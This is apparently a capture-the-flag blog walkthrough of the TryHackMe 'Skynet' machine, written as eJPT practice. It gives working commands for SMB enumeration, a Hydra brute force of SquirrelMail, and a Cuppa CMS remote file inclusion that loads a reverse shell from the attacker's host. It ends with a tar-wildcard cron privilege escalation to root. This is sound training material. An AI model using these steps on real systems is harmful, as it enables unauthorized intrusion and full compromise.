Reconnaissance Ping We verify connectivity and identify the OS by TTL:\nping -c 1 10.66.170.216 64 bytes from 10.66.170.216: icmp_seq=1 ttl=62 time=64.1 ms TTL 62 → Linux (original value is 64, decremented through network hops).\nNmap — Port Scan nmap 10.66.170.216 -n -Pn -sS -p- --open --min-rate=5000 -oG allTCPports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 110/tcp open pop3 139/tcp open netbios-ssn 143/tcp open imap 445/tcp open microsoft-ds Interesting attack surface: HTTP, SMB (139/445) and mail services (110/143).\nNmap — Versions and Scripts nmap 10.66.170.216 -n -Pn -sS -p22,80,110,139,143,445 -sCV --min-rate=5000 -oN skynetscann.txt Key findings:\nApache 2.4.18 on port 80 OpenSSH 7.2p2 on port 22 Samba 4.3.11 on ports 139/445 — workgroup: WORKGROUP Mail: Dovecot pop3d / imapd SMB — smbmap We enumerate shared resources without credentials:\nsmbmap -H 10.66.170.216 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers anonymous READ ONLY Skynet Anonymous Share milesdyson NO ACCESS Miles Dyson Personal Share IPC$ NO ACCESS IPC Service Two important findings: the anonymous share is accessible without credentials, and a user named milesdyson exists.\nSMB — smbclient (anonymous) smbclient //10.66.170.216/anonymous -N smb: \\\u0026gt; dir attention.txt logs/ We download the contents of the logs directory:\nsmb: \\\u0026gt; cd logs smb: \\logs\\\u0026gt; dir log1.txt log2.txt log3.txt log1.txt contains a list of potential passwords — our wordlist for the brute force.\nWeb Fuzzing — gobuster gobuster dir -u http://10.66.170.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,css,xml,bak /admin (Status: 301) /squirrelmail (Status: 301) We find /squirrelmail — a webmail application. The combination of a known username (milesdyson) + the SMB wordlist is perfect for a brute force attack.\nExploitation Brute Force — Hydra against SquirrelMail SquirrelMail uses a POST form. 
We configure Hydra with the correct parameters:\nhydra -l milesdyson -P log1.txt 10.66.170.216 http-post-form \\ \u0026#34;/squirrelmail/src/redirect.php:login_username=^USER^\u0026amp;secretkey=^PASS^\u0026amp;js_autodetect_results=1\u0026amp;just_logged_in=1:F=Unknown user or password incorrect.\u0026#34; [80][http-post-form] host: 10.66.170.216 login: milesdyson password: cyborg007haloterminator Credentials obtained: milesdyson:cyborg007haloterminator\nSquirrelMail — Reading the Inbox We access the webmail at http://10.66.170.216/squirrelmail/src/login.php:\nThe inbox contains 3 emails. The most relevant is from skynet@skynet with subject \u0026ldquo;Samba Password reset\u0026rdquo;:\nWe have changed your smb password after system malfunction. Password: )s{A\u0026amp;2Z=F^n_E.B` New SMB password: `)s{A\u0026amp;2Z=F^n_E.B``\nSMB — Authenticated Access as milesdyson smbclient //10.66.170.216/milesdyson -U milesdyson Password: )s{A\u0026amp;2Z=F^n_E.B` smb: \\\u0026gt; dir Improving Deep Neural Networks.pdf Natural Language Processing-Building Sequence Models.pdf Convolutional Neural Networks-CNN.pdf notes/ Neural Networks and Deep Learning.pdf Structuring your Machine Learning Project.pdf We navigate to notes/ and download important.txt:\nsmb: \\notes\\\u0026gt; get important.txt 1. Add features to beta CMS /45kra24zxs28v3yd 2. Work on T-800 Model 101 blueprints 3. 
Spend more time with my wife Hidden directory revealed: /45kra24zxs28v3yd\nSecond Fuzzing Run — Cuppa CMS We fuzz the hidden directory:\ngobuster dir -u http://10.66.170.216/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,css,xml,bak /administrator (Status: 301) At http://10.66.170.216/45kra24zxs28v3yd/administrator/ we find a Cuppa CMS admin panel.\nSearchsploit — Cuppa CMS RFI Vulnerability searchsploit cuppa cms Cuppa CMS - \u0026#39;/alertConfigField.php\u0026#39; Local/Remote File Inclusion | php/webapps/25971.txt searchsploit -m 25971 The exploit describes a Remote File Inclusion (RFI) vulnerability in the urlConfig parameter of alertConfigField.php. It allows loading a remote PHP file and executing it on the server.\nReverse Shell via RFI We prepare a PHP reverse shell payload (e.g., PentestMonkey\u0026rsquo;s) and host it on our machine with Python:\npython3 -m http.server 80 We set up a netcat listener:\nnc -lvnp 4444 We trigger the RFI pointing to our server:\nhttp://10.66.170.216/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://\u0026lt;YOUR_IP\u0026gt;/rev.php We receive the connection as www-data.\nPost-Exploitation Shell Stabilization python3 -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; # Ctrl+Z stty raw -echo; fg reset xterm export TERM=xterm export SHELL=bash stty rows 48 cols 184 User Flag www-data@skynet:/home/milesdyson$ cat user.txt 7ce5c2109a40f958099283600a9ae807 Privilege Escalation Enumeration — backup.sh Exploring milesdyson\u0026rsquo;s home directory we find the backups folder:\nwww-data@skynet:/home/milesdyson/backups$ cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * This script runs tar with a wildcard (*) in /var/www/html. 
The backup.tgz file updates periodically, indicating it runs as a root cron job.\nExploitation — Tar Wildcard tar accepts arguments starting with -- if it finds them as filenames in the directory. This lets us inject arbitrary options into tar by creating files with special names.\nStep 1: Create a script that sets SUID on /bin/bash:\necho -e \u0026#39;#!/bin/bash\\nchmod +s /bin/bash\u0026#39; \u0026gt; /var/www/html/root_shell.sh Step 2: Create the \u0026ldquo;trap\u0026rdquo; files that will be interpreted as tar flags:\ntouch /var/www/html/--checkpoint=1 touch /var/www/html/\u0026#34;--checkpoint-action=exec=sh root_shell.sh\u0026#34; When cron runs tar cf backup.tgz *, the wildcard expands and includes these files as arguments:\ntar cf backup.tgz --checkpoint=1 --checkpoint-action=exec=sh root_shell.sh ... Step 3: Wait for cron to run and verify:\nwww-data@skynet:/home/milesdyson/backups$ ls -l /bin/bash -rwsr-sr-x 1 root root 1037528 Jul 12 2019 /bin/bash The SUID bit is active. We escalate to root:\n/bin/bash -p bash-4.3# whoami root Root Flag bash-4.3# cat /root/root.txt Lessons Learned Anonymous SMB can be a gold mine — A publicly readable share containing a password wordlist was the entry point for compromising everything else. Always enumerate SMB exhaustively. Pivoting between services is key — Webmail credentials → SMB password → hidden directory → CMS. Each service feeds the next. In a real pentest, this kind of chaining is very common. Internal files reveal hidden attack surface — The important.txt from SMB revealed a directory that would never have appeared in a standard external fuzzing run. RFI requires network access between servers — To exploit Cuppa CMS\u0026rsquo;s RFI, the victim server needs to reach our IP. Always verify connectivity before firing the exploit. Tar wildcard is a classic privesc — Any script that runs tar *, zip *, rsync *, etc. as root in a writable directory is vulnerable. 
Look for cron jobs with wildcards during post-exploitation. For the eJPT This machine directly covers several exam objectives:\nConcept eJPT Relevance SMB Enumeration Core technique in mixed Windows/Linux networks HTTP Brute Force Common scenario in web applications Remote File Inclusion Classic web vulnerability in the syllabus Cron + Wildcard PrivEsc Realistic privesc without kernel exploits Approximate completion time: 60-90 minutes.\nReferences Skynet — TryHackMe Cuppa CMS RFI — Exploit-DB 25971 Tar Wildcard Injection — GTFOBins PentestMonkey PHP Reverse Shell smbmap ","permalink":"https://r3df0x1-c.github.io/f0x1-blog/en/walkthroughs/road-to-ejpt/skynet/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSkynet\u003c/strong\u003e is the eighth machine of the \u003cem\u003eRoad to eJPTv2\u003c/em\u003e series and one of the most complete in the path. It combines SMB enumeration, brute force against a webmail, exploitation of a CMS with Remote File Inclusion, and a classic privilege escalation based on \u003ccode\u003etar\u003c/code\u003e wildcard injection in a cron job.\u003c/p\u003e\n\u003cp\u003eA chained attack flow where each phase depends on the previous one — exactly the kind of reasoning the eJPT evaluates.\u003c/p\u003e","title":"Skynet"}]